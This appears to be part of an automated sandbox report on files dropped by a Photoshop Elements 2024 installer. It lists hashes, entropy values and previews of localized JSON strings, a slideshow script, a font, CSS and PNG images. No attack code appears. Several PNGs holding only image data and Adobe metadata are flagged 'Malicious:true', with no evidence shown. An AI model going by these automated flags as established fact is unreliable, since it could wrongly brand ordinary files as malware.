                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:IPwcRWDMH36aw3lcXISxODG87cU8XCDUEHEmtclaRAyJK:IUDw6NpSxqfDHvt6yJK
                                                                                                      MD5:12B2FAAEC8A5524181967996AE808234
                                                                                                      SHA1:45DE57CF1B5C0CD4C7FA4CFF9A2CEF54E3F71B72
                                                                                                      SHA-256:06C55DFBC16F965839945B5EF066FE98F05EC8146D5B317D22C7D83D6976D806
                                                                                                      SHA-512:C04D15AB32E4F0DE73E124E3A9CD10AEE73C132ACEA29AA343A8DAF5A9680A63B8A5675294880A7447269653F6339D9F215CC311755B3045659A165EF4777B75
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Zelfstudies voor Photoshop Elements",.. "SubTitle": "Ga aan de slag met handige tools en laat u inspireren.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bits) (minimaal vereist)",.. "OperatingSystemMac": "Mac OS 10.12 (minimaal vereist)",.. "Memory": "U hebt minimaal 4 GB RAM nodig om de toepassing te installeren",.. "TextSlide1": "Stem kleur en tint af op een andere foto of gebruik voorinstellingen.",.. "TextSlide2": "Maak in een oogwenk gestileerde tekst.",.. "TextSlide3": "Maak en deel MP4-reels met foto's.",.. "TextSlide4": "Selecteer de lucht of achtergrond met ..n klik.",.. "TextSlide5": "Nieuwe, verbeterde look met lichte en donkere modus.",.. "TextSlide6": "Plus",.. "TextSlide7": "Snelle handelingen voor bewerkingen met ..n muisklik",.. "TextSlide8": "Integratie met Adobe Stock",.. "TextSlide9": "Updates voor internet en mobiele apparaten ",.. "TextSlide10": "(B.ta, alleen Engelstalig)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1005
                                                                                                      Entropy (8bit):5.197252482745693
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:+cRW8l36cr3lctnThcoq19aoy7VyMEnrzyxYqD19t7P6f:GC6WC2zao+VyByYqx9ts
                                                                                                      MD5:A2BC40676845B4DDAFEAAB0523FF3671
                                                                                                      SHA1:AD321F26CEC3D9F2E6812AB525AB62403A145D6E
                                                                                                      SHA-256:55FC0609D045D6691129E51B196C71C3D4D98FC77A4DFE8FC6D62DB75C7B1680
                                                                                                      SHA-512:CD0D8E9374F96FECE5673E7F6D9C259329A991F0CE46C90AFC41A51A937853ABAB71E64AC110FDE3977B7638484E1CC204F08D33A779E067DB637F1B54288EA9
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Samouczki programu Photoshop Elements",.. "SubTitle": "Rozpocznij, poznaj wszystkie podstawy, zainspiruj si..",.. "Operating1xWin": "Windows 7 z dodatkiem Service Pack 1 (64-bitowy) (minimalna wymagana wersja)",.. "OperatingSystemMac": "Mac OS 10.12 (minimalna wymagana wersja)",.. "Memory": "Do instalacji aplikacji wymagane s. co najmniej 4 GB pami.ci RAM.",.. "TextSlide1": "Dopasuj kolor i odcie. zdj.cia lub u.yj ustawie. predefiniowanych.",.. "TextSlide2": "Utw.rz tekst stylizowany w kilka sekund.",.. "TextSlide3": "Tw.rz i udost.pniaj rolki fotograficzne MP4.",.. "TextSlide4": "Kliknij, aby wybra. niebo lub t.o.",.. "TextSlide5": "Nowy, od.wie.ony wygl.d - z trybem jasnym i ciemnym.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panel szybkich operacji do b.yskawicznych edycji",.. "TextSlide8": "Integracja z us.ug. Adobe Stock",.. "TextSlide9": "Aktualizacje internetowe i.mobilne ",.. "TextSlide10": "(Wersja Beta tylko w.j.zyku angielskim
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1335
                                                                                                      Entropy (8bit):4.708899028432502
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:vNcRW3tDc36llsSeJ3lccSeFJGvlqkEZmAhWaTT13hWaTT12hWaTT1FagiXF:V3R46MdZytqkSW+xW+EW+ZCF
                                                                                                      MD5:C08F7659EFCC7319CEA404C411852D7C
                                                                                                      SHA1:960E5E87D616CE32C02101DD95E31A1B9AA5CA01
                                                                                                      SHA-256:0A2B57E247570FCD544EE2D76BB2520824DA5BEC5CC41C4B4082354A8F67087A
                                                                                                      SHA-512:92CEE63DFF79C0F6875ED2B74328995C8A88F473E1E4A412DEF3EA5F6601B2A5EF424D4D1FA45F0E59083A405771A74C7B282AF6879C12E48F62E6AF4BB19781
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "........... .. Photoshop Elements",.. "SubTitle": ".......... ......, ......... ....., ......... ............",.. "Operating1xWin": "Windows 7 . ....... .......... SP1 (64-.........) (.......... .......... ......)",.. "OperatingSystemMac": "Mac OS 10.12 (.......... .......... ......)",.. "Memory": "... ......... .......... ......... ....... 4... ...",.. "TextSlide1": "..... ........ .......... ........... .......... . .......... GIF-............",.. "TextSlide2": "........... .......... ....... ....... . .......... ........ .......",.. "TextSlide4": "........... .......... ....... ....... . .......... ......
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):966
                                                                                                      Entropy (8bit):5.007707161623855
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:UcRWUuN36oJ3l4Kh+sW92zJZ2KAaceGyBL2Jgsmks/NhGQsuUbz9k:wUud6ObhU2zAcGyBOo/NhHsU
                                                                                                      MD5:9A386BDD3D45947475EA973AA97A29FB
                                                                                                      SHA1:F5DA3004442F42B7A59512E35414E6F4758F0634
                                                                                                      SHA-256:7EC82E6599FA6E89DEE2837ECF6544C9062D2133D2D265F181C2710CC22E9129
                                                                                                      SHA-512:796F9078350951EB62CF203E655F9170A1F02DFD9A16E327764955C27437E872E7C2B7612C0817CB4BA52051A0DC4E0B71925DDB0F1E10A81D1E5A41AE645A7B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Sj.lvstudiekurser f.r Photoshop Elements",.. "SubTitle": "Kom ig.ng, l.r dig det grundl.ggande och bli inspirerad.",.. "Operating1xWin": "Windows 7 med Service Pack 1 (64-bitars) kr.vs",.. "OperatingSystemMac": "macOS 10.12 kr.vs",.. "Memory": "Om du vill installera programmet m.ste du ha minst 4 GB med RAM-minne",.. "TextSlide1": "Matcha f.rg och ton fr.n ett annat foto eller anv.nd f.rinst.llningar.",.. "TextSlide2": "Skapa stiliserad text p. n.gra sekunder.",.. "TextSlide3": "Skapa och dela filmrulle i mp4-format.",.. "TextSlide4": "Klicka en g.ng f.r att markera en himmel eller bakgrund.",.. "TextSlide5": "Nytt fr.scht utseende . med ljust och m.rkt l.ge.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panelen Snabb.tg.rder f.r redigeringar med ett klick",.. "TextSlide8": "Adobe Stock-integrering",.. "TextSlide9": "Webb- och mobiluppdateringar ",.. "TextSlide10": "(betaversion endast p. engelska)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):533
                                                                                                      Entropy (8bit):5.952077038813362
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWf0pJ3bu1BJoWhu0mdu3lcW0mdJ3xMIYyeKOTuHHVy1r9R:ARWf2J36aQue3lcW8T1Y1ydv
                                                                                                      MD5:9558152FC5BA73DAE53330E8F74103C3
                                                                                                      SHA1:4583E8593C9BFFE79DB23F204D40F459EE4C579A
                                                                                                      SHA-256:E716DAFAC7426644D61477EF792C1D26FF02E683494E6AE3BBF18FE5672F2409
                                                                                                      SHA-512:A860CFEEFAB7A35CD5B9BA4A9735ECFCD593291D32A846F531AE507A5090DB422F57C4C843341C50D33CC092FDAC8BC1F48ACAF217D400C71440998D2C571581
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ..",.. "SubTitle": ".................",.. "Operating1xWin": "Windows 7 Service Pack 1.64 ........",.. "OperatingSystemMac": "Mac OS 10.12......",.. "Memory": "..... 4GB RAM .........",.. "TextSlide1": "._[Vo8] Instantly turn photos into works of art.",.. "TextSlide2": "._[Vo9] Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._[Vo+] Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):535
                                                                                                      Entropy (8bit):5.95952674339767
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWPu5tTJ3bu1BJoWI3lcnqX+M9L5KOTPWHHVy1b9R:ARWPufJ36a33lcqXnP1I1ydv
                                                                                                      MD5:480263433597D1DA400B0CAB80456B3C
                                                                                                      SHA1:B89620BDC7F4C0917EED3CD3D0DE256A8D2AD23B
                                                                                                      SHA-256:DEF0A09F07831DF10E11B346F2130509CB3AB30991C15A7FBDFE3D4AF6889562
                                                                                                      SHA-512:B910FFDFB82C529E6F8E73A389B336117751356273FF4DAC776F456E9298EF72C903A3F39A09EE2F01207FD7860E5BE1BF05AB94843320B51E954589FA524805
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements ....",.. "SubTitle": ".................",.. "Operating1xWin": "Windows 7 Service Pack 1 (64 ..) (....)",.. "OperatingSystemMac": "Mac OS 10.12 (....)",.. "Memory": "..... 4 GB . RAM ........",.. "TextSlide1": "._[Vo8] Instantly turn photos into works of art.",.. "TextSlide2": "._[Vo9] Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "._[Vo+] Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):500
                                                                                                      Entropy (8bit):4.923628829725424
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:r4DRWrsxRrW/c3bu1BJoWF3lcnRFJgjCd2OT+ZHHVy1HNTR:ARW2Rv36a83lcHd5K1yZNl
                                                                                                      MD5:8BE468F56ED75DF9FD6E9296736C7437
                                                                                                      SHA1:6A5387D379E90A41DF202F2186DD520F707C91B4
                                                                                                      SHA-256:AA811CB8BD2936A0B7F3F884E3347D9DBF4663ABFFDAF64401A13F7910C5FF86
                                                                                                      SHA-512:85C55278DBAF490AD4686CEA2D3EDCC54C891654FE16B5129F5D28C20C2AB9D3A6AB98286F93FFA09906E7D74FDA9A1E8357ABE2A9B2643879C5C775D9372510
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements tutorials",.. "SubTitle": "Get started, get the essentials, get inspired.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (Minimum required)",.. "OperatingSystemMac": "Mac OS 10.12 (Minimum required)",.. "Memory": "You need minimum 4Gb RAM to install the application",.. "TextSlide1": "Instantly turn photos into works of art.",.. "TextSlide2": "Create not-so-still photos with fun Moving Overlays.",.. "TextSlide3": "Warp photos to fit any shape."..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):2787
                                                                                                      Entropy (8bit):5.184018118549148
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:NrWwZsezuvmwQr3TcEuDgAIKRzpIrspGZXBi0ahMDPTAP96kP9N9P9ciP9aMHLPU:4wZ6pQrRu00lIrW4i0rTMU4LBSS574Es
                                                                                                      MD5:44D3F90C842E5387DD782BC6097FABBD
                                                                                                      SHA1:CB6F6D2D643A5D958BD00D7C212BD35C2BB4DDEB
                                                                                                      SHA-256:DDA5350E57A484A80CA07489F18F064D67E21CCB08B36FF2BFA2C37657D6F37F
                                                                                                      SHA-512:3BB152DA1E07A6A86C375A3790C65C185557F92B0148A0C41CB4E1C5D079C3F9E7EC33F6E08652669AB6BFCDABF61B358FDAA353CCF1BFB0D99E4B8C5F6188C6
                                                                                                      Malicious:false
                                                                                                      Preview:$(document).ready(function() { cecInit(); });....function cecInit() {.. var jsonData;.. var locale = getParameterByName("locale");.. var isHighDpi = getParameterByName("isHighDpi");.... $("html").attr("lang", locale.slice(0, 2));.... cecGetLocaleJson(locale);..}....function resizeWin() { myWindow.resizeTo(455, 239); }..var slideIndex = 0;..showSlides();....function showSlides() {.. var i;.. var slides = document.getElementsByClassName("mySlides");.. for (i = 0; i < slides.length; i++) {.. slides[i].style.opacity = "0";.. slides[i].style.visibility = "hidden";.. }.. slideIndex++;.. if (slideIndex > slides.length) {.. slideIndex = 1;.. }.... slides[slideIndex - 1].style.opacity = "1";.. slides[slideIndex - 1].style.visibility = "visible";.... if (slideIndex == 6) {.. slideIndex = 0;.. }.. setTimeout(showSlides, 6000); // Change image every 5 seconds..}....function getParameterByName(name) {.. name = name.replace(/[\[]/, "\\[").replace(/[\]]/, "\\]");.. var
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:Web Open Font Format, TrueType, length 31112, version 1.0
                                                                                                      Category:dropped
                                                                                                      Size (bytes):31112
                                                                                                      Entropy (8bit):7.984152889259412
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:4ol18SuOO3bBAughXjNPQsXVjWuu7jqWdTS2gS:Lr6tAugVjN4sXJYjqWdm2V
                                                                                                      MD5:6AF297E58EDC414EE90C76C2D3EA8678
                                                                                                      SHA1:7497D181CD6FE3A4B01A4F8B6BA6A47D3FA54333
                                                                                                      SHA-256:3E8F59DB6DFAE287AF8DCCC0FDF5E15A8AA2A954C2C232BC6C64536E1A27EAA5
                                                                                                      SHA-512:61E14F8E605C4D2B52C9A874F40E73FDE43625BC468BA3C7316E7672CFFD05B7C1766C875FC1B48218BD2B6856226645EE9BCB45810EB7121C5DBD0C184B7D0A
                                                                                                      Malicious:false
                                                                                                      Preview:wOFF......y................................BASE.......J....c`[.FFTM............[...GDEF.......#...&....OS/2.......X...`j..#cmap...d.........B.cvt .......V...V.}..fpgm...@.......e../.gasp................glyf......k4.....8.head..q4...2...6..Cohhea..qh... ...$.r.hhmtx..q....Y.....6P.loca..s..........c..maxp..u.... ... ....name..u....(...2.JI.post..v..........k.prep..x.........:.&cx.c`d``..b..>........<...7............l....<...6..`d`...a`....d...z.....x.c```d....6...'{..@.J.b%...x.c`d``..b9..`.BF..@...%....c..+O...x.c`a~.8.......,...,..t.!.).Hs.23..01.$00..............o....w00..d.P``...c......\..y..x.c```f.`..F..8..1..,..........P..1............).9.%.5.}.+.x.5.J..~........1...AA@ABA.............._..........p.......~.......4?0..H.).S.....l.p.L@..]..,.l...\.<.|...B.".b...R.2.r...J.*.j...Z.:.z...F.&.f...V.6.v...N...n...^.>.~...A.!.a...Q.1.q....m..g.[.h...W.^.f..u.6n.e..{v...P...y.baA...,..Y......`...0.....b...Kjj.~...k.n_..........>{.Py..CKOsoW...}S.1L.3w6..c.@MU@.../.>...
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):189
                                                                                                      Entropy (8bit):4.841995719284234
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:5RFKqvZKSYRvsDQR7C8jOIbQvLwKEUc3XKRCRNKLUDfFLKYgEQmXt:PJ9MsfIsvMfHHKRkNlZLKYgE7t
                                                                                                      MD5:3A0EC2D2C5020A3CF45C13A87434B285
                                                                                                      SHA1:12275D4D51DE801CE28C88A0C246DE22C6D08120
                                                                                                      SHA-256:406288E48CED388744E5165A1EC4266F419CC409E4A70036E4B15A93AF5C42AB
                                                                                                      SHA-512:A7C6D55F64D91E5D71661E040F4D06D2C873E0B2D2A3B2E52FF60D230A7C7C0924CD0DDC4DC124D53736C934023A27D6ED77C1266732F0B5DE5DC75B02715C8B
                                                                                                      Malicious:false
                                                                                                      Preview:@charset "utf-8";..@font-face {...font-family: 'AdobeClean';...src: url('fonts/adobeclean/adobeclean-regular-webfont.woff') format('woff');...font-weight: normal;...font-style: normal;..}..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):218501
                                                                                                      Entropy (8bit):7.994177806609243
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:IF6yyknzdRSTey+E4xlziCaENqYYRPuL1hGQ/uve:q6dkzdRzyfUlOZENXYJ2jGve
                                                                                                      MD5:70155993A908DD3F179030722111DAFD
                                                                                                      SHA1:7F77A6DA3295559977185127DF0131DFEAAB6401
                                                                                                      SHA-256:CE3DB74C58B62C946144D90E1B98982846BFDBA928F3832EFF5DFB0800BD14DD
                                                                                                      SHA-512:F4F84A88984EA656A13AD7D2F171688910528692E4CDEA2128C01EAAEE1E342AED9CD381162B888634083B38B36D34EEA31AF05E8BA0790570FB26125E6926EE
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:43-07:00" xmp:MetadataDate="2023-06-08T09:43:43-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:9cd1a8a5-fa0f-4664-954e-671adbe841c1" xmpMM:DocumentID="adobe:docid:photoshop:33d3baaf-635d-744b-8709-2bf9163d9686" xmpMM:OriginalDocumentID="xmp.did:f
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):196538
                                                                                                      Entropy (8bit):7.994396839674714
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:CnSlcookIH/9pdgUmvcFsGE4WywNB2DuN/7/r+Hh44JJwN+xMAr/Goh2qMdi3Add:EDo3ctFsR/Ht7KBRTiAr/GDVH7qfpgJb
                                                                                                      MD5:ECBDD07F272A819936179371478A8C3F
                                                                                                      SHA1:FF77202067ACB0463E7878C44004CF55549325C1
                                                                                                      SHA-256:D370C16BDA414ECEED68A3432A1C2EBD37E3E84151E667CA5FCC2DA1A6876305
                                                                                                      SHA-512:1B9FBD76C08CDAD927583F80FE5854EBFF55741805ADE093071A4BEEF0887DEF2CB456AD1B996CE110DD45F9E1B329457833BFF4DA0D391E0E7770D0FF119D21
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:26-07:00" xmp:ModifyDate="2023-06-08T09:43:44-07:00" xmp:MetadataDate="2023-06-08T09:43:44-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:4879ee18-af3c-48f2-a799-f0d2eb0add0b" xmpMM:DocumentID="adobe:docid:photoshop:63b35f9e-9203-bb4d-9b26-ed4aa5736dba" xmpMM:OriginalDocumentID="xmp.did:e
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):149774
                                                                                                      Entropy (8bit):7.991574130023794
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:55ne4y2rhCF9yOm7QMflNGiYb+s9N5FsUA5FLOI70degQa:Pn3rkF27Q6Sbp0PLOI7GR
                                                                                                      MD5:6FC7D9D817DECC0ECA1F54C1540DA1A0
                                                                                                      SHA1:01959A4664CF3EA64A9CC85E6F8F60B25698107B
                                                                                                      SHA-256:9426BB5B0A9E4524C05C861781A8599646B83B0572F548A065C0EC6B791B016D
                                                                                                      SHA-512:1C492B0926915206A4A233FC1F00F3A5DF21AF7C957F00573BC7780E42A3AFAA444002B9420C31A6AC65C89B4B72DD26E6F640302F8C8240592AB5CA3636FC39
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:45-07:00" xmp:MetadataDate="2023-06-08T09:43:45-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:ecb4903c-3b3e-489c-8b36-4bd9573232de" xmpMM:DocumentID="adobe:docid:photoshop:32c69ae6-f6d6-d24d-96bd-887f72b4446c" xmpMM:OriginalDocumentID="xmp.did:5
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):190441
                                                                                                      Entropy (8bit):7.9969327976436695
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:3072:/FkChxBSQXzJ6QT8bCMw8zYi2qgI4rD/lkX4uVToHq2H263TtV+kPbhKztvyKCy:9kCnBS4zaZdbfX4POX4u1oHqgLP+kPOp
                                                                                                      MD5:448941A2F024056569EF9817EEFEB9A7
                                                                                                      SHA1:544EC13242A4B9BD3E0A4D65079C55DF006D6D24
                                                                                                      SHA-256:21EFD9F1038B0D96E1D14A54E2A57F0EA407149F4C522CF23B617932F7336743
                                                                                                      SHA-512:1CE6C24D06CA13F200C7F856887F644C61AFC2DFD5C25C35197002DF4CD519A7EB98C253A6DCFC05017CD60A7DFFBFD4489DC8C068F6E4638BE546B7BEC0BB62
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:46-07:00" xmp:MetadataDate="2023-06-08T09:43:46-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:3f70fe00-776c-4639-9501-80a213adaf5c" xmpMM:DocumentID="adobe:docid:photoshop:403eff47-3e40-d943-b1f3-cd79be874dc9" xmpMM:OriginalDocumentID="xmp.did:6
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 445 x 239, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):222420
                                                                                                      Entropy (8bit):7.994042748653122
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:6144:jcz9b7RCO9pmE6Ko+87V5lIjrYR3XrwPaQOtI:jcz9nRChwQ55lAosPaptI
                                                                                                      MD5:D428286039502448A467942D6F20772E
                                                                                                      SHA1:412C3EA49EC6BC7EB0C52D778BC4E95E33201D88
                                                                                                      SHA-256:61DA52D1E93196300E6E2DD189CB3F5BD5389A42CEA0903139E4D2F475CB6B2E
                                                                                                      SHA-512:0022EB09B113D0B5B584B08458A1D2FB6381758CC94675D98F3EB118D48B4B4444477371D5C9D82C89F8027874D8B70F533327716E27E2395FCF19E8F102EDA4
                                                                                                      Malicious:true
                                                                                                      Preview:.PNG........IHDR.............f.......pHYs.................iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c001 79.c0204b2def, 2023/02/02-12:14:24 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#" xmp:CreatorTool="Adobe Photoshop 24.5 (Macintosh)" xmp:CreateDate="2023-06-08T09:40:25-07:00" xmp:ModifyDate="2023-06-08T09:43:47-07:00" xmp:MetadataDate="2023-06-08T09:43:47-07:00" dc:format="image/png" photoshop:ColorMode="3" xmpMM:InstanceID="xmp.iid:7ac500a4-b904-4744-8465-5d68e86d59d2" xmpMM:DocumentID="adobe:docid:photoshop:a720b7d4-b284-e144-a70b-eee0bf83c698" xmpMM:OriginalDocumentID="xmp.did:4
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 890 x 478, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):553301
                                                                                                      Entropy (8bit):7.995654160787874
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:12288:epoqx1wWl8qxmvXfTrc+toMT06H+rI6k2S+LmWJXEUon:Ooqx1kqGX/DLXzhEmG0Vn
                                                                                                      MD5:3ED1397092BD3EAFDFE71335BF5F5E3C
                                                                                                      SHA1:9D1DBE45E4F1F12A0642EED50F91FDC8DA3B888A
                                                                                                      SHA-256:8276F8BE890ABEEC09B6AAB522F7B45F60ABE2BFA51FEC333924537BABF9D9E3
                                                                                                      SHA-512:5DBE0A094498615CD944F7A16888E4603DC357779A9CA8D8DDEBDCF8AD8C72106EFFD316E3078037EBF254245D2C25BEA5A3ADFE773CCB783090206EE9D75A78
                                                                                                      Malicious:true
